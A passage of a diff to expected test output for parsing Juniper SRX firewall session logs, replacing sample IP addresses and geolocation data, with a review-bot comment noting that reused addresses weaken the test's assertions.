protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", "action": "flow_close", 
@@ -872,7 +783,7 @@ "port": 80, "bytes": 535, "packets": 4, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -880,24 +791,24 @@ "destination": { "nat": { "port": 80, - "ip": "8.23.224.110" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 535, - "packets": 4, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 4 }, "rule": { "name": "permit_all" @@ -905,27 +816,12 @@ "source": { "nat": { "port": 19162, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "10.3.136.49" }, "port": 47776, "bytes": 337, - "ip": "216.160.83.57", - "packets": 6 + "packets": 6, + "ip": "10.3.255.203" }, "juniper": { "srx": { @@ -973,9 +869,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "8.23.224.110" + "10.3.255.203", + "67.43.156.15", + "10.3.136.49" ] }, "client": { 
@@ -985,13 +881,13 @@ "port": 47776, "bytes": 337, "packets": 6, - "ip": "216.160.83.57" + "ip": "10.3.255.203" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715419302Z", - "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP FIN\" source-address=\"216.160.83.57\" source-port=\"47776\" destination-address=\"175.16.199.1\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"175.16.199.1\" nat-source-port=\"19162\" nat-destination-address=\"8.23.224.110\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", + "ingested": "2021-12-10T10:15:58.025394900Z", + "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" 
dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", "start": "2019-04-12T14:29:06.576Z", @@ -1016,7 +912,7 @@ "port": 445, "bytes": 1575, "packets": 9, - "ip": "175.16.199.1" + "ip": "172.16.1.19" }, "log": { "level": "informational" @@ -1026,22 +922,10 @@ "port": 445, "ip": "172.16.1.19" }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 445, "bytes": 1575, "packets": 9, - "ip": "175.16.199.1" + "ip": "172.16.1.19" }, "rule": { "name": "35" @@ -1049,27 +933,12 @@ "source": { "nat": { "port": 53232, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.164" }, "port": 53232, "bytes": 4274, - "ip": "216.160.83.57", - "packets": 13 + "packets": 13, + "ip": "192.168.2.164" }, "juniper": { "srx": { @@ -1109,8 +978,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", + "192.168.2.164", "172.16.1.19" ] }, 
@@ -1121,13 +989,13 @@ "port": 53232, "bytes": 4274, "packets": 13, - "ip": "216.160.83.57" + "ip": "192.168.2.164" }, "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715429932Z", - "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason=\"TCP RST\" source-address=\"216.160.83.57\" source-port=\"53232\" destination-address=\"175.16.199.1\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"175.16.199.1\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", + "ingested": "2021-12-10T10:15:58.025403200Z", + "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", 
"action": "flow_close", @@ -1151,7 +1019,7 @@ "port": 53, "bytes": 136, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1159,24 +1027,24 @@ "destination": { "nat": { "port": 53, - "ip": "58.68.126.198" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 136, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 1 }, "rule": { "name": "NAT" @@ -1184,26 +1052,23 @@ "source": { "nat": { "port": 11152, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 52890, "bytes": 72, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "packets": 1 }, "juniper": { @@ -1246,9 +1111,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "58.68.126.198" + "67.43.156.14" ] }, "client": { 
@@ -1258,13 +1121,13 @@ "port": 52890, "bytes": 72, "packets": 1, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715434901Z", - "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"52890\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025411100Z", + "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" 
application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", "action": "flow_close", @@ -1288,7 +1151,7 @@ "port": 53, "bytes": 116, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1296,24 +1159,24 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 116, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 1 }, "rule": { "name": "trust-to-untrust-001" @@ -1321,27 +1184,12 @@ "source": { "nat": { "port": 20215, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.0.47" }, "port": 62047, "bytes": 67, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "192.168.255.2" }, "juniper": { "srx": { @@ -1383,8 +1231,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "192.168.255.2", + "67.43.156.15", + "192.168.0.47" ] }, "client": { 
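Review bot: In the new `original` of this hunk all four address parameters — `source-address`, `destination-address`, `nat-source-address` and `nat-destination-address` — carry the same value `67.43.156.14`, so the expected `source.ip`, `destination.ip`, `source.nat.ip` and `destination.nat.ip` no longer tell the fields apart and `related.ip` collapses to a single entry (`-1246` hunk); a pipeline regression that swapped source and destination or copied the pre-NAT address into the NAT field would still pass this case. The `-1654`, `-1783` and `-1917` hunks share `67.43.156.14` across destination and both NAT fields, and the `-2062` and `-2200` hunks reuse `.14`/`.15` for the pre- and post-NAT addresses, with the same loss of assertion strength. Both `.14` and `.15` receive the identical Bhutan / AS 35908 enrichment, which suggests the fixture covers more of `67.43.156.0/24` than one host, so distinct host numbers per field — e.g. (constructed) `source-address=\"67.43.156.11\" ... nat-source-address=\"67.43.156.12\"` — would keep the geo coverage without conflating the fields. The sample-log input this expected file is generated from is outside the diff and needs the matching edit.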
@@ -1394,13 +1243,13 @@ "port": 62047, "bytes": 67, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.255.2" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715439189Z", - "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"62047\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"20215\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025419Z", + "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" 
elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", "action": "flow_close", @@ -1424,7 +1273,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "10.104.12.161" }, "log": { "level": "informational" @@ -1434,22 +1283,10 @@ "port": 21, "ip": "10.12.70.1" }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "10.104.12.161" }, "rule": { "name": "FW-FTP" @@ -1457,27 +1294,12 @@ "source": { "nat": { "port": 58020, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "10.9.1.150" }, "port": 9057, "bytes": 0, - "ip": "216.160.83.57", - "packets": 0 + "packets": 0, + "ip": "10.164.110.223" }, "juniper": { "srx": { @@ -1520,8 +1342,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", + "10.164.110.223", + "10.104.12.161", + "10.9.1.150", "10.12.70.1" ] }, 
@@ -1532,13 +1355,13 @@ "port": 9057, "bytes": 0, "packets": 0, - "ip": "216.160.83.57" + "ip": "10.164.110.223" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715443998Z", - "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason=\"application failure or action\" source-address=\"216.160.83.57\" source-port=\"9057\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:15:58.025427400Z", + "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" 
packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": "2015-09-25T14:19:53.846Z", "action": "flow_close", @@ -1560,7 +1383,7 @@ "port": 21 }, "port": 21, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1568,22 +1391,22 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "General-Outbound" @@ -1591,25 +1414,22 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "juniper": { "srx": { @@ -1644,9 +1464,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1654,12 +1473,12 @@ "port": 14406 }, "port": 3129, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715448326Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025435600Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", "category": [ @@ -1681,7 +1500,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" 
@@ -1689,24 +1508,24 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, "bytes": 0, - "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 0 }, "rule": { "name": "General-Outbound" @@ -1714,26 +1533,23 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, "bytes": 48, - "ip": "216.160.83.57", + "ip": "192.168.224.30", "packets": 1 }, "juniper": { @@ -1771,9 +1587,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1783,13 +1598,13 @@ "port": 3129, "bytes": 48, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-11-25T09:37:16.715452314Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025443300Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_started", 
@@ -1813,7 +1628,7 @@ "port": 21, "bytes": 104, "packets": 2, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1821,24 +1636,24 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, "bytes": 104, - "packets": 2, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 2 }, "rule": { "name": "General-Outbound" @@ -1846,26 +1661,23 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, "bytes": 144, - "ip": "216.160.83.57", + "ip": "192.168.224.30", "packets": 3 }, "juniper": { @@ -1905,9 +1717,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1917,13 +1728,13 @@ "port": 3129, "bytes": 144, "packets": 3, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715456081Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"application failure or action\" source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" 